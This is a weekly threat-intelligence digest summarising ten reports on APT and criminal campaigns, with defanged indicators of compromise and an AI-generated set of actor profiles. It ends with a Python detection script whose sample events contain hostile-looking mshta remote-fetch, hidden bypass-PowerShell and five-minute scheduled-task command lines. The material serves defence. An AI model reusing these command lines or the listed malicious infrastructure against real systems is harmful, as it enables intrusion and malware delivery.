Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 53 threat intelligence reports and compiled a summary of the findings, along with the relevant metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.

Title: Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks
Link: https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/
Summary: The Pakistan-linked cyber threat group SideCopy APT has evolved its attack strategies since late December 2024, expanding its targeting from Indian government, defense, and education sectors to critical infrastructure areas, including railways and oil & gas. A notable shift in tactics is the transition from HTML Application (HTA) files to Microsoft Installer (MSI) packages for malware deployment, combined with DLL side-loading and reflective loading to evade detection. Recent campaigns have unveiled new malware, including CurlBack RAT, which provides data exfiltration and remote access, while the group continues to rely on phishing emails to lure victims. The group's operations are further characterized by the use of compromised domains for hosting malicious content and by cross-platform capabilities, targeting both Windows and Linux systems.
Threats: sidecopy_campaign dll_sideloading_technique xenorat spark_rat asyncrat curlback ares_rat poseidon transparenttribe_group meshagent_tool opendir spear-phishing_technique uac_bypass_technique hvnc_tool moonpeak kimsuky_group dragonspark_group tag-100_group

Title: Scattered Spider: Still Hunting for Victims in 2025
Link: https://www.silentpush.com/blog/scattered-spider-2025/
Summary: Scattered Spider, also known as UNC3944, is a hacker collective that has been active since at least 2022, focusing on social engineering attacks to compromise sensitive user credentials and authentication tokens. As of early 2025, the group has targeted various high-profile brands, employing five unique phishing kits that have evolved over time while legacy tactics have declined. One significant development is the updated Spectre Remote Access Trojan (RAT), which features advanced stealth capabilities and enhanced command and control mechanisms, demonstrating the group's ongoing tactical advancement. Their phishing strategies often involve swiftly registered domains that mimic legitimate services, making detection challenging, and they have recently shifted to hosting providers that offer more anonymous infrastructure. Despite legal actions against some members, the overall threat from Scattered Spider remains significant, as their operational methodologies adapt to bypass evolving defenses.
Threats: 0ktapus_group karma spectre_rat fireblock_tool muddywater_group cryptochameleon robinhood evilginx_tool mitm_technique

Title: What's Trending: Top Cyber Attacker Techniques, December 2024 to February 2025
Link: https://www.reliaquest.com/blog/threat-spotlight-cyber-attacker-techniques-dec-2024-to-feb-2025/
Summary: Between December 2024 and February 2025, ReliaQuest documented a notable increase in cyber threats, particularly from financially motivated actors, with a 21.3% rise in initial access attempts via VPN brute-forcing against remote-access devices. The group "Black Basta" was highlighted for using automated brute-forcing tools, while a significant finding involved the misuse of the open-source tool System Informer to execute unauthorized commands after a Windows Administrator account was compromised. Additionally, the analysis revealed a rise in MSHTA proxy execution driven by deceptive CAPTCHA lures, alongside the emergence of the "Sneaky 2FA" phishing kit, which lets attackers bypass multi-factor authentication with little effort. The report also identified CL0P ransomware as a leading threat actor, noted for exploiting vulnerabilities in widely used software, particularly within the retail sector, and anticipated a rapid evolution in the cyber threat landscape with increased specialization in attack techniques.
Threats: storm_1811_group clop blackbasta clearfake spear-phishing_technique sneaky_2fa_tool aitm_technique credential_harvesting_technique teamsphisher_tool clickfix_technique supply_chain_technique stac5777_group microsoft_quick_assist_tool dll_sideloading_technique lumma_stealer ransomhub blackbasta_group xfiles_stealer

Title: AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale
Link: https://www.sentinelone.com/labs/akirabot-ai-powered-bot-bypasses-captchas-spams-websites-at-scale/
Summary: AkiraBot is an advanced spam framework that targets website chats and contact forms, primarily to promote low-quality SEO services, impacting over 400,000 websites since September 2024, with at least 80,000 successful spam occurrences. It utilizes OpenAI technology to generate unique, tailored spam messages, complicating detection through CAPTCHA-bypass services and manipulation of browser attributes. Originating as "Shopbot," AkiraBot has evolved to target various platforms and runs multiple concurrent threads to maximize its spamming efficiency, while using proxies and a Telegram integration to manage its operations and evade detection.
Threats: akirabot_tool nextcaptcha_tool fastcaptcha_tool capsolver_tool smartproxy_tool residential_proxy_technique blackbasta

Title: BeaverTail and Tropidoor Malware Distributed via Recruitment Emails
Link: https://asec.ahnlab.com/en/87299/
Summary: On November 29, 2024, a cyber incident was identified in which threat actors impersonated a recruitment email from the developer community Dev.to to disseminate malware, specifically a malicious code named BeaverTail and a downloader labeled "car.dll." The malware, linked to North Korean cyber activities, primarily targets information theft and can execute additional payloads; it was found to communicate with command and control servers, gathering system information and employing advanced encryption techniques. Analysis revealed that "car.dll" exhibits similarities with LightlessCan malware and that its execution path included suspicious identifiers, while obfuscation and credential extraction techniques were noted in the behavior of BeaverTail.
Threats: beavertail tropidoor lightlesscan lazarus_group invisibleferret spear-phishing_technique
Indicators of compromise:
ip: 135[.]181[.]242[.]24, 191[.]96[.]31[.]38
url: http://103[.]35[.]190[.]170/Proxy[.]php, http://86[.]104[.]72[.]247/Proxy[.]php, https://45[.]8[.]146[.]93/proxy/Proxy[.]php, https://86[.]104[.]72[.]247/proxy/Proxy[.]php
hash: md5=3aed5502118eb9b8c9f8a779d4b09e11, md5=84d25292717671610c936bca7f0626f5, md5=94ef379e332f3a120ab16154a7ee7a00, md5=b29ddcc9affdd56a520f23a61b670134

Title: Shuckworm Targets Foreign Military Mission Based in Ukraine
Link: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel
Summary: Shuckworm, a cyber espionage group with ties to Russia, has intensified its campaign against Ukraine in 2025, specifically targeting military operations linked to a Western nation. The group is employing an updated infostealer tool known as GammaSteel, transitioning from VBS scripts to PowerShell to enhance its tactics, which include a multi-stage approach for maintaining stealthy communication with command and control (C&C) servers. The infection vector was identified on February 26 through a registry change related to a malicious shortcut file from an external drive, leading to the collection of sensitive system data and the establishment of connections to C&C servers, which leveraged legitimate services for address resolution. The malware's architecture facilitates reconnaissance tasks and data exfiltration, using a Tor network proxy when needed to mask its activities.
Threats: gamaredon_group gammasteel

Title: Kimsuky (APT-Q-2) suspected to launch an attack on Korean companies
Link: https://www.ctfiot.com/236795.html
Summary: Kimsuky, a cyber threat actor group from North Korea, has been targeting South Korean entities since at least 2012, focusing on stealing sensitive information using techniques like social engineering and spear phishing. Recent analysis by the Qi'anxin Threat Intelligence Center revealed malware associated with Kimsuky that carried a legitimate digital signature from a South Korean software company, employed various tactics for command and control communication, and offered functionalities such as data collection and the execution of additional payloads. The malware exhibits advanced features, including environment checks and self-destruction capabilities, while remaining consistent with previous Kimsuky attacks through naming conventions and operational strategies designed to evade detection.
Threats: kimsuky_group

Title: Faceted Stone: Sapphire Werewolf uses a new version of Amethyst Stealer for attacks on the fuel and energy sector
Link: https://bi.zone/expertise/blog/kamen-ogranennyy-sapphire-werewolf-ispolzuet-novuyu-versiyu-amethyst-stealer-dlya-atak-na-tek/
Summary: The Sapphire Werewolf threat cluster has developed an updated version of the Amethyst Stealer malware, primarily distributed through phishing emails targeting fuel and energy companies. This enhanced malware incorporates techniques to avoid detection by identifying virtual environments and uses Triple DES encryption. The malicious payload, disguised as a benign "Service note.rar" attachment containing a harmful executable, is capable of collecting extensive system information and exfiltrating sensitive data such as authentication credentials through a hardcoded URL, thereby reinforcing the cluster's capabilities in bypassing security measures.
Threats: sapphire_werewolf_group amethyst dotnet_reactor_tool
Indicators of compromise:
domain: wondrous-bluejay-lively[.]ngrok-free[.]app
url: http://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments[.]js
hash: sha256=4149b07d9fdcd04b34efa0a64e47a1b9581ff9d1f670ea552b7c93fb66199b5f, sha1=94034e04636bc4450273b50b07b45f636ff59b05, md5=93d048364909018a492c8f709d385438

Title: Pick your Poison — A Double-Edged Email Attack
Link: https://cofense.com/blog/pick-your-poison-a-double-edged-email-attack
Summary: The Cofense Phishing Defense Center has identified a sophisticated cyber-attack campaign that leverages phishing tactics to steal Office 365 credentials and distribute malware. The campaign uses a file deletion reminder in emails that appear to come from a legitimate file-sharing service, deceiving users into clicking links that lead to a malicious PDF file. Inside the PDF, two hyperlinks disguised as legitimate options direct victims either to a spoofed Microsoft login page or to the installation of the ConnectWise Remote Access Tool (RAT), which enables unauthorized remote access. The malware employs persistence techniques to remain operational on compromised systems, highlighting the significant risks posed by this campaign.
Threats: connectwise_tool screenconnect_tool

Title: Analyzing spear-phishing campaign by Konni APT.
Link: https://prii308.github.io/Analyzing-spear-phishing-campaign-by-Konni-APT/
Summary: The Konni APT group's cyber campaign employs a multi-stage malware delivery method, beginning with a malicious LNK file that connects to a Dropbox-hosted command-and-control (C2) server to download further payloads. This LNK file uses `mshta.exe` to execute hidden malicious code, which, after processing, extracts a PowerShell script that communicates with a specific IP address and downloads additional malicious content. The operation ensures persistence by scheduling tasks to run every five minutes, and employs obfuscated JavaScript to execute harmful PowerShell commands while managing downloaded files and their outputs systematically.
Threats: spear-phishing_technique scarcruft_group kimsuky_group
Indicators of compromise:
ip: 64[.]20[.]59[.]148
url: https://www[.]dropbox[.]com/scl/fi/ouck6s5mxghmwz57tzkzj/Sm[.]dat?rlkey=2a6qys5xgufg2ouk93or0vmcr&st=zzaqdclb&dl=1
hash: sha256=6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2, sha256=1a61340179c811b17c332452cfd1d7277d615697a6993ca870834b91e7070975, sha256=9ce42177bafe552495b8329726bb4acfcb5f9e886377a2e76fb901fa01ae407c, sha256=ec78b61a5f54805bbdffd69d57ce76db41d1adbb85c544688769eacf29d928cb, sha256=a1376496406895a00d9009b36a6e1073553f3198502a71d33d7438e68914261a

This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
Based on the provided article excerpts, the following threat actors and information were identified:
# Threat Actor: SideCopy APT
## Attribution & Identity
Pakistan-linked cyber threat group.
## Activity Summary
Evolved attack strategies since late December 2024. Expanded targeting from Indian government, defense, and education sectors to critical infrastructure (railways and oil & gas). Shifted from using HTA files to MSI packages for malware deployment. Campaigns involve data exfiltration and remote access.
## Tactics, Techniques & Procedures
- Transition from using HTML Application (HTA) files to deploying malware via Microsoft Installer (MSI) packages.
- Employing DLL side-loading for evasion.
- Employing reflective loading for evasion.
- Utilizing spear-phishing tactics via deceptive emails.
- Leveraging compromised domains for hosting malicious content.
- Cross-platform capabilities targeting Windows and Linux.
## Targeting
- Sectors: Indian government, defense, education, critical infrastructure (railways, oil & gas).
- Geography: India (implied by targeting focus).
- Victims: Not specifically named, but sectors are defined.
## Tools & Infrastructure
- Malware families used: CurlBack RAT (new malware for remote access/exfiltration), xenorat, spark\_rat, asyncrat, ares\_rat, poseidon, meshagent\_tool, hvnc\_tool.
- Infrastructure (C2, domains, IPs): Compromised domains used for hosting malicious content.
- **Domains:** gadchiroli\[.\]egovservice\[.\]in, pen\[.\]egovservice\[.\]in, cpcontacts\[.\]egovservice\[.\]in, webdisk\[.\]egovservice\[.\]in, cpcalendars\[.\]egovservice\[.\]in, webmail\[.\]egovservice\[.\]in, dss\[.\]egovservice\[.\]in, cmc\[.\]egovservice\[.\]in, mail\[.\]egovservice\[.\]in, pakola\[.\]egovservice\[.\]in, pakora\[.\]egovservice\[.\]in, egovservice\[.\]in, drjagrutichavan\[.\]com, nhp\[.\]mowr\[.\]gov\[.\]in, pmshriggssssiwan\[.\]in, educationportals\[.\]in, updates\[.\]widgetservicecenter\[.\]com, updates\[.\]biossysinternal\[.\]com.
- **URLs:** https://egovservice\[.\]in/vvcmcrts, https://egovservice\[.\]in/vvcmc\_safety\_tank, https://egovservice\[.\]in/130521/13, https://egovservice\[.\]in/testformonline/test\_form, https://egovservice\[.\]in/payroll\_vvcmc, https://egovservice\[.\]in/pakora/egovservice\[.\]in, https://egovservice\[.\]in/dssrts, https://egovservice\[.\]in/cmc, https://egovservice\[.\]in/vvcmcrtsballarpur72, https://egovservice\[.\]in/dss, https://egovservice\[.\]in/130521/set\_authority, https://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1, https://modspaceinterior\[.\]com/wp-content/upgrade/01, https://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1/lns/clinsixfer\[.\]elf, http://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1/lns/2024-National-Holidays-RH-PER\_N-1\[.\]pdf, https://updates\[.\]widgetservicecenter\[.\]com/antivmcommand, https://modspaceinterior\[.\]com/wp-content/upgrade/02/NDC65-Updated-Schedule\[.\]zip, https://modspaceinterior\[.\]com/wp-content/upgrade/01/NDC65-Updated-Schedule\[.\]hta.
- **IPs:** 79\[.\]141\[.\]161\[.\]58:1256, 172\[.\]67\[.\]163\[.\]31, 104\[.\]21\[.\]13\[.\]17.
## Implications
SideCopy APT is demonstrating agile adaptation by replacing older delivery methods (HTA) with newer techniques (MSI packages) and by expanding its focus into India's vital national infrastructure sectors, increasing risk to national stability.
## Mitigations
- Harden defenses against MSI-based malware execution.
- Implement robust detection for DLL side-loading and reflective loading patterns.
- Enhance monitoring and analysis of spear-phishing attempts targeting the identified critical sectors.
***
# Threat Actor: Scattered Spider (UNC3944)
## Attribution & Identity
Also known as UNC3944.
## Activity Summary
Reportedly active and hunting for victims into 2025. *Note: The context is too truncated to provide specific campaign details.*
## Tactics, Techniques & Procedures
Not detailed in the provided excerpt.
## Targeting
Not detailed in the provided excerpt beyond the general statement of "Hunting for Victims."
## Tools & Infrastructure
- **Infrastructure:**
  - RDP/ScreenConnect: http://instance-i4zsy0-relay\[.\]screenconnect\[.\]com:443
  - File Hosting: https://www\[.\]files\[.\]fm/u/jv2stwauw7
  - Malicious Download: https://femaxpipeworks\[.\]com/LgGxTNCi
  - Malicious Download: https://apsxsecured\[.\]screenconnect\[.\]com/Bin/SecuredOnedrive\[.\]ClientSetup\[.\]exe?e=Access&y=Guest
## Implications
Remains an active and persistent threat actor projecting activity into the near future (2025).
## Mitigations
- Review security controls related to remote access solutions like ScreenConnect.
- Scrutinize traffic to generic file hosting services used for initial payload delivery.
***
# Threat Actor: Konni APT
## Attribution & Identity
Konni APT group. Associated with groups like Scarcruft and Kimsuky (mentioned in context of related threats, though not definitive attribution).
## Activity Summary
Employs a multi-stage malware delivery method involving spear-phishing. The operation focuses on persistence and systematic execution management.
## Tactics, Techniques & Procedures
- Initial access via malicious LNK files.
- C2 communication leveraging Dropbox for initial payload download (using *Sm.dat*).
- Command execution via `mshta.exe` to run hidden malicious code.
- Payload delivery via execution of obfuscated JavaScript, which in turn connects to a specific IP for further malicious content download (PowerShell scripts).
- Establishes persistence by creating scheduled tasks that run every five minutes.
- Uses obfuscated JavaScript to execute harmful PowerShell commands.
## Targeting
- No specific sectors or geographies detailed in the excerpt, but tactics suggest targeted activity (spear-phishing).
## Tools & Infrastructure
- **Delivery Mechanism:** Malicious LNK file, Dropbox hosting.
- **Execution:** `mshta.exe`, PowerShell.
- **Persistence:** Scheduled Tasks.
- **Infrastructure (C2/Downloads):**
  - **IP:** 64\[.\]20\[.\]59\[.\]148
  - **Domain/URL (Dropbox):** https://www\[.\]dropbox\[.\]com/scl/fi/ouck6s5mxghmwz57tzkzj/Sm\[.\]dat?rlkey=2a6qys5xgufg2ouk93or0vmcr&st=zzaqdclb&dl=1
## Implications
Konni APT utilizes multi-layered obfuscation and trusted services (Dropbox) for initial staging, posing a challenge to perimeter defenses relying solely on traditional file signature analysis. Persistence mechanisms are aggressive (5-minute checks).
## Mitigations
- Restrict execution of downloaded LNK files or scripts relying on trusted public services for payload delivery.
- Implement strict controls and logging over `mshta.exe` execution, especially when initiated by macro or script files.
- Monitor for the creation of high-frequency scheduled tasks designed for persistence.
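The three Konni mitigations above (and the MSHTA proxy execution noted in the ReliaQuest report) can be turned into concrete detection rules. The Python below is an added example, not code from the digest or from any of the cited reports: it runs three rules over constructed Sysmon Event ID 1 (process creation) and Windows Security Event ID 4698 (scheduled task created) events, flagging `mshta.exe` fetching remote content, PowerShell spawned by `mshta.exe`, and a newly registered task that re-runs a script host every five minutes or faster. All hosts (`.invalid`), paths and task names are made up for the demo.

```python
import re
import xml.etree.ElementTree as ET
from datetime import timedelta

# Added example: detection logic for the mshta -> PowerShell -> scheduled-task
# chain. Event shapes follow Sysmon Event ID 1 (process creation) and Windows
# Security Event ID 4698 (scheduled task created); all values are constructed.

URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# A task that re-runs a script host this often (or faster) is worth an alert.
MAX_BENIGN_INTERVAL = timedelta(minutes=5)


def image_name(path):
    """Lower-cased file name of a Windows image path ('C:\\x\\mshta.exe' -> 'mshta.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_iso_duration(value):
    """Parse the ISO 8601 durations Task Scheduler XML uses (PT5M, PT1H30M, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        raise ValueError(f"unsupported duration: {value!r}")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return timedelta(days=days, hours=hours, minutes=minutes, seconds=seconds)


def check_process_event(ev):
    """Rules for one process-creation event; returns a list of (rule, detail)."""
    findings = []
    image = image_name(ev["Image"])
    parent = image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Rule 1: mshta.exe pulling content from a URL (remote HTA / proxy execution).
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append(("mshta_remote_content", cmd))
    # Rule 2: PowerShell launched by mshta.exe (the script hand-off stage).
    if parent == "mshta.exe" and image in {"powershell.exe", "pwsh.exe"}:
        findings.append(("mshta_spawns_powershell", cmd))
    return findings


def check_task_event(ev):
    """Rule 3: new task with repetition interval <= 5 min whose action is a script host."""
    root = ET.fromstring(ev["TaskContent"])
    intervals = [parse_iso_duration(i.text) for i in root.iterfind(".//t:Repetition/t:Interval", TASK_NS)]
    commands = [c.text or "" for c in root.iterfind(".//t:Exec/t:Command", TASK_NS)]
    runs_script_host = any(image_name(c) in SCRIPT_HOSTS for c in commands)
    if intervals and min(intervals) <= MAX_BENIGN_INTERVAL and runs_script_host:
        return [("high_frequency_script_task", f"{ev['TaskName']} every {min(intervals)}")]
    return []


def scan(events):
    """Dispatch each event to the rule set for its type and collect all findings."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            findings.extend(check_process_event(ev))
        elif ev["EventID"] == 4698:
            findings.extend(check_task_event(ev))
    return findings


def task_xml(interval, command, arguments):
    """Build a minimal Task Scheduler XML body for the constructed samples."""
    return (
        f'<Task version="1.2" xmlns="{TASK_NS["t"]}">'
        f"<Triggers><TimeTrigger><Repetition><Interval>{interval}</Interval></Repetition>"
        "<StartBoundary>2025-04-01T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>"
        f'<Actions Context="Author"><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>'
        "</Task>"
    )


# Constructed sample telemetry: placeholder hosts (.invalid) and paths, not report IoCs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe https://lure.example.invalid/s/Sm.dat"},           # LNK-launched, remote content
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -File C:\\Users\\Public\\Sm.ps1"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\LegacyApp\\app.exe",
     "CommandLine": 'mshta.exe "C:\\Program Files\\LegacyApp\\help.hta"'},         # local HTA: not flagged
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Update\\SmUpdate",
     "TaskContent": task_xml("PT5M", "C:\\Windows\\System32\\wscript.exe", "//e:jscript C:\\Users\\Public\\update.js")},
    {"EventID": 4698, "TaskName": "\\Ops\\HourlyInventory",                       # hourly admin script: not flagged
     "TaskContent": task_xml("PT1H", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                             "-File C:\\Ops\\inventory.ps1")},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

In a real pipeline the same three checks would run over Sysmon and Security channel events exported from a SIEM; the interval threshold and the script-host list are the knobs to tune against the environment's own scheduled-task baseline.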